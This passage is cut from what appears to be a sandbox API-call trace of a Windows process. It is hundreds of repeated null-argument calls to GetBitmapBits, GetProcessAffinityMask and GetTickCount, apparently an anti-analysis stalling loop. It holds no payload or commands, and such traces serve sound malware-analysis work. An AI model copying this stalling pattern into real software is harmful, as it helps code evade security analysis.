lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.769] GetTickCount () returned 0x2027f9b [0242.769] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.769] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.769] GetTickCount () returned 0x2027f9b [0242.769] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.769] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.769] GetTickCount () returned 0x2027f9b [0242.769] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.770] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.770] GetTickCount () returned 0x2027f9b [0242.770] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.770] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.770] GetTickCount () returned 0x2027f9b [0242.770] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.770] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.770] GetTickCount () returned 0x2027f9b [0242.770] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.770] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.770] GetTickCount () returned 0x2027f9b [0242.770] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.770] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.770] GetTickCount () returned 0x2027f9b [0242.770] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.770] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.770] GetTickCount () returned 0x2027f9b [0242.770] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.770] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.771] GetTickCount () returned 0x2027f9b [0242.771] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.771] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.771] GetTickCount () returned 0x2027f9b [0242.771] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.771] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.771] GetTickCount () returned 0x2027f9b [0242.771] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.771] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.771] GetTickCount () returned 0x2027f9b [0242.771] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.771] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.771] GetTickCount () returned 0x2027f9b [0242.771] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.771] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.771] GetTickCount () returned 0x2027f9b [0242.771] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.771] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.772] GetTickCount () returned 0x2027f9b [0242.772] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.772] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.772] GetTickCount () returned 0x2027f9b [0242.772] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.772] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.772] GetTickCount () returned 0x2027f9b [0242.772] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.772] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.772] GetTickCount () returned 0x2027fab [0242.772] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.772] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.772] GetTickCount () returned 0x2027fab [0242.772] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.772] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.772] GetTickCount () returned 0x2027fab [0242.772] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.772] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.772] GetTickCount () returned 0x2027fab [0242.773] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.773] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.773] GetTickCount () returned 0x2027fab [0242.773] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.773] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.773] GetTickCount () returned 0x2027fab [0242.773] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.773] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.773] GetTickCount () returned 0x2027fab [0242.773] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.773] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.773] GetTickCount () returned 0x2027fab [0242.773] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.773] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.773] GetTickCount () returned 0x2027fab [0242.773] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.773] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.773] GetTickCount () returned 0x2027fab [0242.773] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.774] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.774] GetTickCount () returned 0x2027fab [0242.774] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.774] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.774] GetTickCount () returned 0x2027fab [0242.774] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.774] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.774] GetTickCount () returned 0x2027fab [0242.774] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.774] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.774] GetTickCount () returned 0x2027fab [0242.774] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.774] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.774] GetTickCount () returned 0x2027fab [0242.774] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.774] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.774] GetTickCount () returned 0x2027fab [0242.774] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.774] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.775] GetTickCount () returned 0x2027fab [0242.775] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.775] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.775] GetTickCount () returned 0x2027fab [0242.775] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.775] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.775] GetTickCount () returned 0x2027fab [0242.775] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.775] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.775] GetTickCount () returned 0x2027fab [0242.775] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.775] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.775] GetTickCount () returned 0x2027fab [0242.775] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.775] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.775] GetTickCount () returned 0x2027fab [0242.775] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.775] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.776] GetTickCount () returned 0x2027fab [0242.776] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.776] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.776] GetTickCount () returned 0x2027fab [0242.776] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.776] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.776] GetTickCount () returned 0x2027fab [0247.491] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.491] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.491] GetTickCount () returned 0x202921a [0247.491] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.491] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.491] GetTickCount () returned 0x202921a [0247.491] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.491] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.491] GetTickCount () returned 0x202921a [0247.491] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.492] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.492] GetTickCount () returned 0x202921a [0247.492] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.492] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.492] GetTickCount () returned 0x202921a [0247.492] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.492] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.492] GetTickCount () returned 0x202921a [0247.492] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.492] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.492] GetTickCount () returned 0x202921a [0247.492] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.492] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.492] GetTickCount () returned 0x202921a [0247.492] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.492] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.492] GetTickCount () returned 0x202921a [0247.492] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.493] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.493] GetTickCount () returned 0x202921a [0247.493] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.493] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.493] GetTickCount () returned 0x202921a [0247.493] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.493] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.493] GetTickCount () returned 0x202921a [0247.493] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.493] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.493] GetTickCount () returned 0x202921a [0247.493] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.493] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.493] GetTickCount () returned 0x202921a [0247.493] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.494] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.494] GetTickCount () returned 0x202921a [0247.494] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.494] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.494] GetTickCount () returned 0x202921a [0247.494] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.494] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.494] GetTickCount () returned 0x202921a [0247.494] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.494] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.494] GetTickCount () returned 0x202921a [0247.494] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.494] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.494] GetTickCount () returned 0x202921a [0247.494] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.494] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.494] GetTickCount () returned 0x202921a [0247.494] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.495] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.495] GetTickCount () returned 0x202921a [0247.495] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.495] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.495] GetTickCount () returned 0x202921a [0247.495] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.495] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.495] GetTickCount () returned 0x202921a [0247.495] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.495] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.495] GetTickCount () returned 0x202921a [0247.495] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.495] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.495] GetTickCount () returned 0x202921a [0247.495] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.495] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.495] GetTickCount () returned 0x202921a [0247.495] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.495] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.496] GetTickCount () returned 0x202921a [0247.496] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.496] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.496] GetTickCount () returned 0x202921a [0247.496] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.496] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.496] GetTickCount () returned 0x202921a [0247.496] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.496] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.496] GetTickCount () returned 0x202921a [0247.496] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.496] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.496] GetTickCount () returned 0x202921a [0247.496] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.496] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.496] GetTickCount () returned 0x202921a [0247.496] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.497] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.497] GetTickCount () returned 0x202921a [0247.497] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.497] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.497] GetTickCount () returned 0x202921a [0247.497] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.497] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.497] GetTickCount () returned 0x202921a [0247.497] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.497] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.497] GetTickCount () returned 0x202921a [0247.497] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.497] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.497] GetTickCount () returned 0x202921a [0247.497] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.497] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.497] GetTickCount () returned 0x202921a [0247.497] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.497] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.497] GetTickCount () returned 0x202921a [0247.497] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.498] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.498] GetTickCount () returned 0x202921a [0247.498] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.498] GetProcessAffinityMask (in: hProcess=0x0, 